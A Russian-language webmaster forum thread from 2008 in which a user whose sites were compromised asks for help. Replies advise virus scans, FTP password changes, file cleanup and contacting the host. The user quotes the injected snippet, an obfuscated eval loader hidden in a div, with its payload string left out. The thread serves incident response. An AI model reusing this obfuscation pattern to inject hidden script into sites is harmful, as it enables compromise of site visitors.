Master-X
Форум | Новости | Статьи
Главная » Форум » Программинг, Скрипты, Софт, Сервисы » 
Тема: Прописался скрипт во все корневые файлы - как пофиксить?
цитата
18/12/08 в 22:37
 vampa
Господа, помогите разобраться с проблемой.
Обнаружилось, что не могу зайти в админку блога - пустая страница и все.
Стала смотреть код, проверять другие блоги, проверять не_только блоги - на всех доменах в корневых файлах появился скрипт, в 64битной кодировке.
Начало " Код:
Content-Type: text/plain; charset="windows-1251"; name="file3.txt"
Content-transfer-encoding: base64
" и дальше - огромная строка символов.
Черт, никогда такое не встречала.. ч делать? Тупо перебрать все фаылй и удалить кусок кода - заново появится, на одном проверила.
Где копать? icon_cry.gif
цитата
18/12/08 в 22:43
 _s_[sov]
какой скрипт? в какой кодировке? чета как то хз.. маловато инфы если честно icon_rolleyes.gif
цитата
18/12/08 в 22:54
 Axel-B
Срочно проверить комп на вирусы и поменять пароли на FTP в первую очередь. Потом вручную или скриптом проверить все файлы и вычистить всю дрянь.
цитата
18/12/08 в 22:56
 vampa
Почти все - в 64битной колировке, человеческий вид Штирлиц показал.
Вот то что в хтмл сидит

Код:
<div id='x08d190606e1c4db62d91c48b4f6c62641'><script>var jQuery = eval('wziznMdzoAwW.YeYvYaMlz'.replace(/[zAMWY]/g, ''));
jQuery('ТУТ ООЧЕНЬ ДЛИННАЯ СТРОКА');</script></div>


один и тот же везде
цитата
18/12/08 в 23:00
 vampa
Axel-B писал:
Срочно проверить комп на вирусы и поменять пароли на FTP в первую очередь. Потом вручную или скриптом проверить все файлы и вычистить всю дрянь.


уже проверяется.
сменено.
удалить из страниц - это все? дополнительных действий никаких?
цитата
18/12/08 в 23:18
 Axel-B
В моем случае не понадобилось, в твоем не знаю. Посмотри, может где файлы какие подозрительные появились (скрипты). Не помешает хостеру стукнуть, чтоб они посмотрели каким образом изменялись файлы.


Эта страница в полной версии